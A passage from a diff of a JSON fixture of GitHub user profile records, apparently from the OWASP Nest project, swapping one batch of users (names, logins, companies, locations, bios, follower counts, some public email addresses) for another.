"2015-01-29T19:47:40Z", - "updated_at": "2023-10-21T06:56:03Z", - "node_id": "MDQ6VXNlcjEwNzYyOTkx", - "bio": "SysAdmin / PenTester with passion about Photography", - "is_hireable": true, - "twitter_username": "riccardomollo" + "following_count": 7, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-08-08T15:55:45Z", + "updated_at": "2024-09-05T19:44:34Z", + "node_id": "MDQ6VXNlcjY5Mzk1NzMz", + "bio": "EU based Software/DevOps Engineer with a fascination for Open Source Software and the Container Technology", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1115, + "pk": 6373, "fields": { - "nest_created_at": "2024-09-11T22:49:10.019Z", - "nest_updated_at": "2024-09-13T05:22:33.903Z", - "name": "", - "login": "EmiliaChovancova", + "nest_created_at": "2024-09-22T07:42:12.987Z", + "nest_updated_at": "2024-09-22T18:49:00.262Z", + "name": "Wen Zhou", + "login": "zdtsw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44211508?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/915053?v=4", + "company": "@RedHatOfficial", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 49, + "public_gists_count": 31, + "public_repositories_count": 210, + "created_at": "2011-07-14T13:43:51Z", + "updated_at": "2024-08-21T07:15:00Z", + "node_id": "MDQ6VXNlcjkxNTA1Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6374, + "fields": { + "nest_created_at": "2024-09-22T07:42:18.862Z", + "nest_updated_at": "2024-09-22T18:44:51.758Z", + "name": "Brandon Maier", + "login": "blmaier", + "email": "brandon.maier@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7141086?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-10-16T19:23:45Z", - "updated_at": "2023-03-08T20:48:10Z", - "node_id": "MDQ6VXNlcjQ0MjExNTA4", + "public_repositories_count": 30, + "created_at": "2014-04-02T16:45:59Z", + "updated_at": "2024-09-22T16:20:54Z", + "node_id": "MDQ6VXNlcjcxNDEwODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388128,124 +645277,124 @@ }, { "model": "github.user", - "pk": 1116, + "pk": 6375, "fields": { - "nest_created_at": "2024-09-11T22:49:26.219Z", - "nest_updated_at": "2024-09-18T18:53:47.324Z", - "name": "Lütfü Mert Ceylan", - "login": "lutfumertceylan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53023641?v=4", + "nest_created_at": "2024-09-22T07:42:28.340Z", + "nest_updated_at": "2024-09-22T18:45:01.122Z", + "name": "Daniel", + "login": "Serraniel", + "email": "mail@serraniel.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/8461282?v=4", "company": "", - "location": "Warsaw", + "location": "Aachen", "collaborators_count": 0, - "following_count": 37, - "followers_count": 221, + "following_count": 7, + "followers_count": 31, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2019-07-17T23:22:00Z", - "updated_at": "2024-05-22T21:46:47Z", - "node_id": "MDQ6VXNlcjUzMDIzNjQx", - "bio": "security researcher", + "public_repositories_count": 20, + "created_at": "2014-08-15T21:42:26Z", + "updated_at": "2024-09-16T19:34:14Z", + "node_id": "MDQ6VXNlcjg0NjEyODI=", + "bio": "Working as a software developer in Germany since 2014.", "is_hireable": false, - "twitter_username": "lutfumertceylan" + "twitter_username": "Serraniel" } }, { "model": "github.user", - "pk": 1117, + "pk": 6376, "fields": { - "nest_created_at": "2024-09-11T22:49:30.568Z", - "nest_updated_at": "2024-09-18T18:53:50.507Z", - "name": "", - "login": "RoseSecurity", + "nest_created_at": "2024-09-22T07:42:28.651Z", + "nest_updated_at": "2024-09-22T19:41:51.968Z", + "name": "Caroline", + "login": "leec94", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72598486?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4466297?v=4", + "company": "IBM", + "location": "Boston, MA ", "collaborators_count": 0, - "following_count": 39, - "followers_count": 1261, - "public_gists_count": 18, - "public_repositories_count": 24, - "created_at": "2020-10-09T07:41:37Z", - "updated_at": "2024-09-12T20:06:08Z", - "node_id": "MDQ6VXNlcjcyNTk4NDg2", - "bio": "Platform Engineer, Open Source, Go, Terraform", + "following_count": 22, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2013-05-18T17:24:16Z", + "updated_at": "2024-08-28T16:52:23Z", + "node_id": "MDQ6VXNlcjQ0NjYyOTc=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "carolineperhaps" } }, { "model": "github.user", - "pk": 1118, + "pk": 6377, "fields": { - "nest_created_at": "2024-09-11T22:49:33.591Z", - "nest_updated_at": "2024-09-13T05:22:21.219Z", - "name": "Justin Bollinger", - "login": "bandrel", - "email": "justin.bollinger@trustedsec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3598052?v=4", - "company": "@TrustedSec", - "location": "Ohio, USA", + "nest_created_at": "2024-09-22T07:42:28.970Z", + "nest_updated_at": "2024-09-22T18:51:22.068Z", + "name": "Aurélien Pupier", + "login": "apupier", + "email": "apupier@redhat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1105127?v=4", + "company": "Red Hat", + "location": "Grenoble Area, France", "collaborators_count": 0, - "following_count": 14, - "followers_count": 90, - "public_gists_count": 14, - "public_repositories_count": 45, - "created_at": "2013-02-14T22:49:38Z", - "updated_at": "2024-06-17T13:47:35Z", - "node_id": "MDQ6VXNlcjM1OTgwNTI=", - "bio": "Principal Security Consultant @TrustedSec", + "following_count": 2, + "followers_count": 42, + "public_gists_count": 28, + "public_repositories_count": 403, + "created_at": "2011-10-05T15:19:24Z", + "updated_at": "2024-03-06T09:53:28Z", + "node_id": "MDQ6VXNlcjExMDUxMjc=", + "bio": "Principal Software Engineer in Red Hat Fuse Tooling Team", "is_hireable": false, - "twitter_username": "bandrel" + "twitter_username": "apupier" } }, { "model": "github.user", - "pk": 1119, + "pk": 6378, "fields": { - "nest_created_at": "2024-09-11T22:49:38.443Z", - "nest_updated_at": "2024-09-18T18:54:11.109Z", - "name": "OWASP Domain Protect", - "login": "domain-protect", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107151354?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:42:34.390Z", + "nest_updated_at": "2024-09-22T18:45:07.120Z", + "name": "José González", + "login": "jgongo", + "email": "jose.gonzalez@openinput.com", + "avatar_url": "https://avatars.githubusercontent.com/u/664005?v=4", + "company": "OPEN input", + "location": "Barcelona", "collaborators_count": 0, "following_count": 0, - "followers_count": 18, - "public_gists_count": 0, + "followers_count": 4, + "public_gists_count": 3, "public_repositories_count": 8, - "created_at": "2022-06-08T20:37:53Z", - "updated_at": "2023-05-28T09:34:54Z", - "node_id": "O_kgDOBmL_-g", + "created_at": "2011-03-11T12:20:16Z", + "updated_at": "2024-09-16T09:39:39Z", + "node_id": "MDQ6VXNlcjY2NDAwNQ==", "bio": "", - "is_hireable": false, - "twitter_username": "domain_protect" + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1120, + "pk": 6379, "fields": { - "nest_created_at": "2024-09-11T22:49:41.480Z", - "nest_updated_at": "2024-09-13T05:22:01.343Z", - "name": "Uros", - "login": "soru23", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17911999?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:42:35.738Z", + "nest_updated_at": "2024-09-22T18:45:08.374Z", + "name": "", + "login": "DwayneCoussement", + "email": "dwayne@intivoto.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4704844?v=4", + "company": "Intivoto", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-03-17T18:43:32Z", - "updated_at": "2024-08-14T21:21:54Z", - "node_id": "MDQ6VXNlcjE3OTExOTk5", + "public_repositories_count": 7, + "created_at": "2013-06-15T12:55:53Z", + "updated_at": "2024-09-17T13:47:20Z", + "node_id": "MDQ6VXNlcjQ3MDQ4NDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388253,24 +645402,24 @@ }, { "model": "github.user", - "pk": 1121, + "pk": 6380, "fields": { - "nest_created_at": "2024-09-11T22:49:42.942Z", - "nest_updated_at": "2024-09-11T22:50:15.121Z", - "name": "Paul Schwarzenberger", - "login": "paulschwarzenberger", + "nest_created_at": "2024-09-22T07:42:40.606Z", + "nest_updated_at": "2024-09-22T19:27:58.028Z", + "name": "", + "login": "actions-user", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26303407?v=4", - "company": "Celidor", + "avatar_url": "https://avatars.githubusercontent.com/u/65916846?v=4", + "company": "@actions", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 14, + "following_count": 0, + "followers_count": 1983, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2017-03-09T13:33:05Z", - "updated_at": "2024-09-11T08:41:15Z", - "node_id": "MDQ6VXNlcjI2MzAzNDA3", + "created_at": "2020-05-25T17:35:50Z", + "updated_at": "2021-02-19T05:23:11Z", + "node_id": "MDQ6VXNlcjY1OTE2ODQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388278,24 +645427,24 @@ }, { "model": "github.user", - "pk": 1122, + "pk": 6381, "fields": { - "nest_created_at": "2024-09-11T22:50:10.562Z", - "nest_updated_at": "2024-09-18T18:54:09.231Z", + "nest_created_at": "2024-09-22T07:42:40.923Z", + "nest_updated_at": "2024-09-22T18:45:13.512Z", "name": "", - "login": "cleo2525", + "login": "volviq", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51095139?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4905204?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 6, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-05-27T18:49:40Z", - "updated_at": "2024-07-16T22:08:22Z", - "node_id": "MDQ6VXNlcjUxMDk1MTM5", + "public_gists_count": 5, + "public_repositories_count": 14, + "created_at": "2013-07-01T11:55:10Z", + "updated_at": "2024-04-25T13:02:09Z", + "node_id": "MDQ6VXNlcjQ5MDUyMDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388303,199 +645452,224 @@ }, { "model": "github.user", - "pk": 1123, + "pk": 6382, "fields": { - "nest_created_at": "2024-09-11T22:50:26.079Z", - "nest_updated_at": "2024-09-18T18:54:28.144Z", - "name": "Cider Security Research", - "login": "cider-security-research", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101509203?v=4", + "nest_created_at": "2024-09-22T07:42:52.625Z", + "nest_updated_at": "2024-09-22T18:48:30.160Z", + "name": "Dan Rollo", + "login": "bhamail", + "email": "danrollo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/578919?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 102, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-03-13T13:04:55Z", - "updated_at": "2024-04-24T16:58:25Z", - "node_id": "O_kgDOBgzoUw", - "bio": "Research by Cider Security", - "is_hireable": false, - "twitter_username": "cider_sec" + "following_count": 2, + "followers_count": 25, + "public_gists_count": 2, + "public_repositories_count": 108, + "created_at": "2011-01-23T07:00:14Z", + "updated_at": "2024-09-12T13:52:48Z", + "node_id": "MDQ6VXNlcjU3ODkxOQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1124, + "pk": 6383, "fields": { - "nest_created_at": "2024-09-11T22:50:29.191Z", - "nest_updated_at": "2024-09-13T05:21:40.823Z", - "name": "Dominik Miklaszewski", - "login": "dominikmi", + "nest_created_at": "2024-09-22T07:42:53.560Z", + "nest_updated_at": "2024-09-22T18:45:26.331Z", + "name": "", + "login": "ssi-zloe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45730823?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/88662095?v=4", "company": "", - "location": "Warsaw, Poland", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 6, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2018-12-09T10:02:16Z", - "updated_at": "2024-08-25T12:48:21Z", - "node_id": "MDQ6VXNlcjQ1NzMwODIz", - "bio": "OopsOps!", + "public_repositories_count": 1, + "created_at": "2021-08-09T11:35:09Z", + "updated_at": "2021-08-09T11:35:09Z", + "node_id": "MDQ6VXNlcjg4NjYyMDk1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1125, + "pk": 6384, "fields": { - "nest_created_at": "2024-09-11T22:50:35.164Z", - "nest_updated_at": "2024-09-18T18:54:36.414Z", - "name": "mimosa", - "login": "securecoding-mimosa", + "nest_created_at": "2024-09-22T07:42:53.867Z", + "nest_updated_at": "2024-09-22T18:46:59.935Z", + "name": "", + "login": "synaos-bwi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96038722?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/117291659?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-12-13T05:26:55Z", - "updated_at": "2022-08-25T03:50:42Z", - "node_id": "O_kgDOBblvQg", - "bio": "touch me not", + "public_repositories_count": 2, + "created_at": "2022-11-02T14:28:28Z", + "updated_at": "2023-04-13T09:24:31Z", + "node_id": "U_kgDOBv26iw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1126, + "pk": 6385, "fields": { - "nest_created_at": "2024-09-11T22:50:38.927Z", - "nest_updated_at": "2024-09-11T22:50:38.927Z", - "name": "WeiLiang", - "login": "WeiLiangLOL", + "nest_created_at": "2024-09-22T07:42:54.516Z", + "nest_updated_at": "2024-09-22T18:53:31.063Z", + "name": "Michael de Senna", + "login": "desenna", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11328135?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1390003?v=4", + "company": "@bloomberg", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2012-01-29T23:22:38Z", + "updated_at": "2024-09-20T11:26:03Z", + "node_id": "MDQ6VXNlcjEzOTAwMDM=", + "bio": "Complexity is the enemy of execution\r\n", + "is_hireable": true, + "twitter_username": "desenna" + } +}, +{ + "model": "github.user", + "pk": 6386, + "fields": { + "nest_created_at": "2024-09-22T07:42:56.482Z", + "nest_updated_at": "2024-09-22T18:53:32.998Z", + "name": "Thomas Jensen", + "login": "tsjensen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7677131?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 4, - "public_gists_count": 2, - "public_repositories_count": 6, - "created_at": "2015-03-05T07:48:25Z", - "updated_at": "2024-08-27T15:16:41Z", - "node_id": "MDQ6VXNlcjExMzI4MTM1", - "bio": "I'm a pretty good developer. I think.", + "following_count": 22, + "followers_count": 28, + "public_gists_count": 3, + "public_repositories_count": 10, + "created_at": "2014-05-23T07:45:27Z", + "updated_at": "2024-09-07T17:11:01Z", + "node_id": "MDQ6VXNlcjc2NzcxMzE=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1127, + "pk": 6387, "fields": { - "nest_created_at": "2024-09-11T22:50:44.701Z", - "nest_updated_at": "2024-09-18T18:54:43.939Z", - "name": "Coraza Web Application Firewall", - "login": "corazawaf", + "nest_created_at": "2024-09-22T07:42:56.802Z", + "nest_updated_at": "2024-09-22T19:42:23.365Z", + "name": "Torsten Mehnert", + "login": "tmehnert", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/90621731?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/92546601?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 114, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2021-09-13T12:29:34Z", - "updated_at": "2023-05-25T10:17:01Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjkwNjIxNzMx", - "bio": "Coraza Web Application Firewall repositories", + "public_repositories_count": 10, + "created_at": "2021-10-14T19:15:37Z", + "updated_at": "2024-04-23T20:09:11Z", + "node_id": "U_kgDOBYQmKQ", + "bio": "", "is_hireable": false, - "twitter_username": "corazaio" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1128, + "pk": 6388, "fields": { - "nest_created_at": "2024-09-11T22:50:51.010Z", - "nest_updated_at": "2024-09-18T17:52:01.622Z", - "name": "Juan Pablo Tosso", - "login": "jptosso", + "nest_created_at": "2024-09-22T07:42:57.113Z", + "nest_updated_at": "2024-09-22T19:28:10.251Z", + "name": "Yan Wittmann", + "login": "YanWittmann", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1236942?v=4", - "company": "Traceable AI", - "location": "Vigo, Spain", + "avatar_url": "https://avatars.githubusercontent.com/u/37689635?v=4", + "company": "{metæffekt} GmbH", + "location": "Heidelberg", "collaborators_count": 0, "following_count": 6, - "followers_count": 47, - "public_gists_count": 13, - "public_repositories_count": 55, - "created_at": "2011-12-02T20:34:52Z", - "updated_at": "2024-09-18T17:06:42Z", - "node_id": "MDQ6VXNlcjEyMzY5NDI=", - "bio": "I'm a human", - "is_hireable": true, - "twitter_username": "jptosso" + "followers_count": 10, + "public_gists_count": 3, + "public_repositories_count": 31, + "created_at": "2018-03-23T08:13:06Z", + "updated_at": "2024-09-15T11:42:23Z", + "node_id": "MDQ6VXNlcjM3Njg5NjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1129, + "pk": 6389, "fields": { - "nest_created_at": "2024-09-11T22:50:52.706Z", - "nest_updated_at": "2024-09-12T02:27:02.683Z", - "name": "José Carlos Chávez", - "login": "jcchavezs", - "email": "josecarlos.chavez@okta.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3075074?v=4", - "company": "@okta ", - "location": "Barcelona - Cataluña", + "nest_created_at": "2024-09-22T07:42:57.423Z", + "nest_updated_at": "2024-09-22T18:45:30.172Z", + "name": "Andrea Cosentino", + "login": "oscerd", + "email": "ancosen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5106647?v=4", + "company": "Red Hat", + "location": "Rome, Italy", "collaborators_count": 0, - "following_count": 71, - "followers_count": 160, - "public_gists_count": 15, - "public_repositories_count": 238, - "created_at": "2012-12-18T20:12:29Z", - "updated_at": "2024-08-26T07:45:04Z", - "node_id": "MDQ6VXNlcjMwNzUwNzQ=", - "bio": "Security Software Engineer @ Okta, OWASP Coraza co-leader and Peruvian llama ambassador.", + "following_count": 31, + "followers_count": 308, + "public_gists_count": 90, + "public_repositories_count": 258, + "created_at": "2013-07-28T12:01:07Z", + "updated_at": "2024-07-30T07:44:58Z", + "node_id": "MDQ6VXNlcjUxMDY2NDc=", + "bio": "Apache Camel :camel: | Apache Member | Security | Open Source ", "is_hireable": false, - "twitter_username": "jcchavezs" + "twitter_username": "oscerd2" } }, { "model": "github.user", - "pk": 1130, + "pk": 6390, "fields": { - "nest_created_at": "2024-09-11T22:50:56.837Z", - "nest_updated_at": "2024-09-11T22:51:05.498Z", - "name": "Anuraag (Rag) Agrawal", - "login": "anuraaga", - "email": "anuraaga@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/198344?v=4", - "company": "Earth", - "location": "Yokohama, Japan", + "nest_created_at": "2024-09-22T07:42:57.773Z", + "nest_updated_at": "2024-09-22T18:45:30.482Z", + "name": "Andrew Leonard", + "login": "andrew-m-leonard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31470007?v=4", + "company": "Red Hat", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 225, - "public_gists_count": 26, - "public_repositories_count": 373, - "created_at": "2010-02-06T12:52:17Z", - "updated_at": "2024-09-05T03:26:56Z", - "node_id": "MDQ6VXNlcjE5ODM0NA==", + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 67, + "created_at": "2017-08-30T08:16:03Z", + "updated_at": "2024-09-04T09:32:41Z", + "node_id": "MDQ6VXNlcjMxNDcwMDA3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388503,49 +645677,49 @@ }, { "model": "github.user", - "pk": 1131, + "pk": 6391, "fields": { - "nest_created_at": "2024-09-11T22:51:02.014Z", - "nest_updated_at": "2024-09-11T22:51:02.014Z", - "name": "Tit Petric", - "login": "titpetric", - "email": "black@scene-si.org", - "avatar_url": "https://avatars.githubusercontent.com/u/233360?v=4", - "company": "Tyk Technologies", - "location": "Porec, Croatia", + "nest_created_at": "2024-09-22T07:42:58.090Z", + "nest_updated_at": "2024-09-22T18:45:30.796Z", + "name": "Carl Dea", + "login": "carldea", + "email": "carldea@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1594624?v=4", + "company": "Deloitte", + "location": "Berlin, MD", "collaborators_count": 0, - "following_count": 25, - "followers_count": 219, - "public_gists_count": 17, - "public_repositories_count": 99, - "created_at": "2010-03-30T13:32:43Z", - "updated_at": "2024-07-29T10:20:31Z", - "node_id": "MDQ6VXNlcjIzMzM2MA==", - "bio": "", - "is_hireable": true, - "twitter_username": "titpetric" + "following_count": 112, + "followers_count": 112, + "public_gists_count": 1, + "public_repositories_count": 180, + "created_at": "2012-04-01T03:15:36Z", + "updated_at": "2024-09-22T17:15:46Z", + "node_id": "MDQ6VXNlcjE1OTQ2MjQ=", + "bio": "Tech Lead / Lead developer at Deloitte", + "is_hireable": false, + "twitter_username": "carldea" } }, { "model": "github.user", - "pk": 1132, + "pk": 6392, "fields": { - "nest_created_at": "2024-09-11T22:51:05.111Z", - "nest_updated_at": "2024-09-11T22:51:05.111Z", - "name": "Thibault \"bui\" Koechlin", - "login": "buixor", + "nest_created_at": "2024-09-22T07:42:58.400Z", + "nest_updated_at": "2024-09-22T18:45:31.099Z", + "name": "Chadwick Baatz", + "login": "cmbaatz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/990714?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40895835?v=4", + "company": "GoSecure", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 91, - "public_gists_count": 1, - "public_repositories_count": 18, - "created_at": "2011-08-19T09:44:30Z", - "updated_at": "2024-06-19T07:48:08Z", - "node_id": "MDQ6VXNlcjk5MDcxNA==", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-07-06T15:34:30Z", + "updated_at": "2024-09-16T18:19:46Z", + "node_id": "MDQ6VXNlcjQwODk1ODM1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388553,24 +645727,24 @@ }, { "model": "github.user", - "pk": 1133, + "pk": 6393, "fields": { - "nest_created_at": "2024-09-11T22:51:09.143Z", - "nest_updated_at": "2024-09-11T22:51:09.143Z", - "name": "Sundar N", - "login": "ns-sundar", - "email": "sundar.nadathur@intel.com", - "avatar_url": "https://avatars.githubusercontent.com/u/17782735?v=4", + "nest_created_at": "2024-09-22T07:42:58.709Z", + "nest_updated_at": "2024-09-22T18:45:31.413Z", + "name": "George Andrinopoulos", + "login": "geoandri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7126008?v=4", "company": "", - "location": "Santa Clara, CA", + "location": "Athens", "collaborators_count": 0, - "following_count": 3, - "followers_count": 5, + "following_count": 5, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-03-11T12:00:06Z", - "updated_at": "2024-02-13T07:00:39Z", - "node_id": "MDQ6VXNlcjE3NzgyNzM1", + "public_repositories_count": 30, + "created_at": "2014-04-01T10:54:22Z", + "updated_at": "2024-09-09T18:53:59Z", + "node_id": "MDQ6VXNlcjcxMjYwMDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388578,99 +645752,99 @@ }, { "model": "github.user", - "pk": 1134, + "pk": 6394, "fields": { - "nest_created_at": "2024-09-11T22:51:13.859Z", - "nest_updated_at": "2024-09-11T22:51:13.859Z", - "name": "Meisam Monsef", - "login": "meisamrce", - "email": "meisamrce@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5562950?v=4", + "nest_created_at": "2024-09-22T07:42:59.020Z", + "nest_updated_at": "2024-09-22T18:45:31.735Z", + "name": "Koray Tugay", + "login": "koraytugay", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1974123?v=4", "company": "", - "location": "Iran", + "location": "Toronto", "collaborators_count": 0, - "following_count": 0, - "followers_count": 76, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-09-28T07:32:45Z", - "updated_at": "2024-08-25T13:04:15Z", - "node_id": "MDQ6VXNlcjU1NjI5NTA=", - "bio": "App & Web Developer - Vulnerability researcher ", + "following_count": 7, + "followers_count": 25, + "public_gists_count": 7, + "public_repositories_count": 45, + "created_at": "2012-07-14T08:50:12Z", + "updated_at": "2024-09-18T23:56:14Z", + "node_id": "MDQ6VXNlcjE5NzQxMjM=", + "bio": "a Software developer who does not like self-promoting profiles. \r\n\r\n[Stolen from @HoiSinhGun]", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1135, + "pk": 6395, "fields": { - "nest_created_at": "2024-09-11T22:51:19.748Z", - "nest_updated_at": "2024-09-11T22:51:19.748Z", - "name": "Shivansh Verma", - "login": "VermaShivansh", - "email": "SHIVANSH29.SV@GMAIL.COM", - "avatar_url": "https://avatars.githubusercontent.com/u/75882684?v=4", - "company": "Ringover France", - "location": "Remote", + "nest_created_at": "2024-09-22T07:42:59.330Z", + "nest_updated_at": "2024-09-22T18:45:32.084Z", + "name": "Pascal van Eck", + "login": "patveck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3521311?v=4", + "company": "@Software-Improvement-Group ", + "location": "Amsterdam, The Netherlands", "collaborators_count": 0, - "following_count": 10, - "followers_count": 30, - "public_gists_count": 1, - "public_repositories_count": 46, - "created_at": "2020-12-12T10:30:59Z", - "updated_at": "2024-08-13T08:59:10Z", - "node_id": "MDQ6VXNlcjc1ODgyNjg0", - "bio": "Full-Stack Developer - ReactJs, NodeJs, Golang, GCP, AWS, Docker", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2013-02-09T21:08:36Z", + "updated_at": "2024-04-22T14:08:20Z", + "node_id": "MDQ6VXNlcjM1MjEzMTE=", + "bio": "Software developer and former consultant at Software Improvement Group. Previously, assistant professor at University of Twente.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1136, + "pk": 6396, "fields": { - "nest_created_at": "2024-09-11T22:51:20.980Z", - "nest_updated_at": "2024-09-11T22:51:20.980Z", - "name": "Lxt3h", - "login": "Lexterl33t", + "nest_created_at": "2024-09-22T07:42:59.643Z", + "nest_updated_at": "2024-09-22T18:49:25.168Z", + "name": "Pavel Shukhman", + "login": "taleodor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44911576?v=4", - "company": "The Alchemist Co.", - "location": "/home/lxt3h/Desktop", + "avatar_url": "https://avatars.githubusercontent.com/u/3857268?v=4", + "company": "Reliza", + "location": "Ottawa", "collaborators_count": 0, - "following_count": 195, - "followers_count": 177, + "following_count": 48, + "followers_count": 21, "public_gists_count": 0, - "public_repositories_count": 152, - "created_at": "2018-11-09T23:00:34Z", - "updated_at": "2024-09-03T07:35:38Z", - "node_id": "MDQ6VXNlcjQ0OTExNTc2", - "bio": "Security researcher at Fuzzinglabs", + "public_repositories_count": 40, + "created_at": "2013-03-13T19:22:35Z", + "updated_at": "2024-09-01T11:24:08Z", + "node_id": "MDQ6VXNlcjM4NTcyNjg=", + "bio": "DevOps Expert, MCS, CKA, Co-Founder and CEO at Reliza;\r\nBlog: https://worklifenotes.com", "is_hireable": true, - "twitter_username": "" + "twitter_username": "taleodor" } }, { "model": "github.user", - "pk": 1137, + "pk": 6397, "fields": { - "nest_created_at": "2024-09-11T22:51:24.430Z", - "nest_updated_at": "2024-09-11T22:51:24.430Z", - "name": "键盘上的少侠", - "login": "sun-sun-sun", + "nest_created_at": "2024-09-22T07:42:59.960Z", + "nest_updated_at": "2024-09-22T18:45:32.712Z", + "name": "", + "login": "renjith85", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44592475?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3585316?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-10-30T00:46:04Z", - "updated_at": "2023-04-06T02:57:33Z", - "node_id": "MDQ6VXNlcjQ0NTkyNDc1", + "public_repositories_count": 14, + "created_at": "2013-02-13T15:09:59Z", + "updated_at": "2024-02-06T19:02:26Z", + "node_id": "MDQ6VXNlcjM1ODUzMTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388678,24 +645852,24 @@ }, { "model": "github.user", - "pk": 1138, + "pk": 6398, "fields": { - "nest_created_at": "2024-09-11T22:51:25.245Z", - "nest_updated_at": "2024-09-11T22:51:28.860Z", - "name": "", - "login": "blotus", - "email": "sebastien@blot.me", - "avatar_url": "https://avatars.githubusercontent.com/u/835060?v=4", - 